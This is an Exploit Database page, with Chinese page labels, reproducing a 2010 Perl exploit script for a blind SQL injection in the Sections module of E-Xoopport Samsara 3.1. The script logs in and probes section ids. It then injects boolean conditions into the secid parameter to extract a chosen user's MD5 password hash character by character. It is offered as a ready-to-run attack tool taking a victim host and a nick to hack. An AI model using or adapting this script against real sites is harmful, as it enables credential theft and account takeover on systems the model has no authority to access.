E-Xoopport Samsara 3.1 (Sections Module) – Blind SQL Injection

• Exploit Database
• 8 阅读

• 作者： _mRkZ_
  日期： 2010-09-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15004/

• #!/usr/bin/perl
  # [0-Day] E-Xoopport - Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit
  # Author/s: _mRkZ_ & Dante90, WaRWolFz Crew
  # Created: 2010.09.12 after 0 days the bug was discovered.
  # Web Site: www.warwolfz.org
  
  use LWP::UserAgent;
  use HTTP::Cookies;
  use HTTP::Request::Common;
  
  $^O eq 'MSWin32' ? system('cls') : system('clear');
  
  print "
  E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
  +---------------------------------------------------+
  | Script: E-Xoopport|
  | Affected versions: 3.1|
  | Bug: Remote Blind SQL Injection (Sections Module) |
  | Author/s: _mRkZ_ & Dante90, WaRWolFz Crew |
  | Web Site: www.warwolfz.org|
  +---------------------------------------------------+
  ";
  
  if (@ARGV != 4) {
  	print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
  	exit;
  }
  
  $host= $ARGV[0];
  $usr = $ARGV[1];
  $pwd = $ARGV[2];
  $anickde = $ARGV[3];
  $anick = '0x'.EncHex($anickde);
  
  print "[+] Logging In...\r\n";
  my %postdata = (
  	uname => "$usr",
  	pass => "$pwd"
  );
  $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla 5.0");
  my $req		= (POST $host, \%postdata);
  my $cookies = HTTP::Cookies->new();
  $request	= $ua->request($req);
  $ua->cookie_jar($cookies);
  $content	= $request->content;
  if ($content =~ /<head><meta http-equiv="Refresh" content="0; URL=modules\/news\/" \/><\/head>/i) {
  	print "[+] Logged in\r\n";
  } else {
  	print "[-] Fatal Error: username/password incorrect?\r\n";
  	exit;
  }
  
  print "[!] Retriving section id...\r\n";
  $idi = 0;
  while ($idi != 11) {
  	$idi++;
  	$ua = LWP::UserAgent->new;
  	$ua->agent("Mozilla 5.0");
  	my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$idi";
  	$request	= $ua->get($req);
  	$ua->cookie_jar($cookies);
  	$content	= $request->content;
  	if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
  		$secid = $idi;
  		last;
  	}
  }
  
  if(!defined $secid) {
  	print "[-] Fatal Error: Section id not found!\r\n";
  	exit;
  } else {
  	print "[+] Section id '$secid' retrieved\r\n";
  }
  
  print "[!] Checking path...\r\n";
  $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla 5.0");
  my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid";
  $request	= $ua->get($req);
  $ua->cookie_jar($cookies);
  $content	= $request->content;
  if ($content =~ /Ecco i documenti della sezione/i) {
  	print "[+] Correct Path\r\n";
  } else {
  	print "[-] Fatal Error: Wrong Path\r\n";
  	exit;
  }
  
  print "[!] Checking if vulnerability has been fixed...\r\n";
  $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla 5.0");
  my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+1=1";
  $request	= $ua->get($req);
  $ua->cookie_jar($cookies);
  $content	= $request->content;
  if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
  	print "[+] Vulnerability has not been fixed...\r\n";
  } else {
  	print "[-] Fatal Error: Vulnerability has been fixed\r\n";
  	open LOGG, ">log.html";
  	print LOGG $content;
  	close LOGG;
  	exit;
  }
  
  print "[!] Checking nick to hack...\r\n";
  $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla 5.0");
  my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),32,1))>0";
  $request	= $ua->get($req);
  $ua->cookie_jar($cookies);
  $content	= $request->content;
  if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
  	print "[+] Nick exists...\r\n";
  } else {
  	print "[-] Fatal Error: Nick does not exists\r\n";
  	exit;
  }
  
  print "[!] Exploiting...\r\n";
  my $i = 1;
  while ($i != 33) {
  	my $wn	= 47;
  	while (1) {
  		$wn++;
  		$ua = LWP::UserAgent->new;
  		$ua->agent("Mozilla 5.0");
  		my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
  		$request	= $ua->get($req);
  		$ua->cookie_jar($cookies);
  		$content	= $request->content;
  		if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
  			$pwdchr .= chr($wn);
  			$^O eq 'MSWin32' ? system('cls') : system('clear');
  			PrintChars($anickde, $pwdchr, $secid);
  			last;
  		}
  	}
  	$i++;
  }
  
  print "\r\n[+] Exploiting completed!\r\n\r\n";
  print "Visit: www.warwolfz.net\r\n\r\n";
  
  sub PrintChars {
  $anick1 = $_[0];
  $chars = $_[1];
  $secid = $_[2];
  print "
  E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
  +---------------------------------------------------+
  | Script: E-Xoopport|
  | Affected versions: 3.1|
  | Bug: Remote Blind SQL Injection (Sections Module) |
  | Author/s: _mRkZ_ & Dante90, WaRWolFz Crew |
  | Web Site: www.warwolfz.org|
  +---------------------------------------------------+
  [+] Logging In...
  [+] Logged in
  [!] Retriving section id...
  [+] Section id '$secid' retrived
  [!] Checking path...
  [+] Correct Path
  [!] Checking if vulnerability has been fixed...
  [+] Vulnerability has not been fixed...
  [!] Checking nick to hack...
  [+] Nick exists...
  [!] Exploiting...
  [+] ".$anick1."'s md5 Password: $chars
  ";
  }
  
  sub EncHex {
  	$char = $_[0];
  	chomp $char;
  	@trans = unpack("H*", "$char");
  	return $trans[0];
  }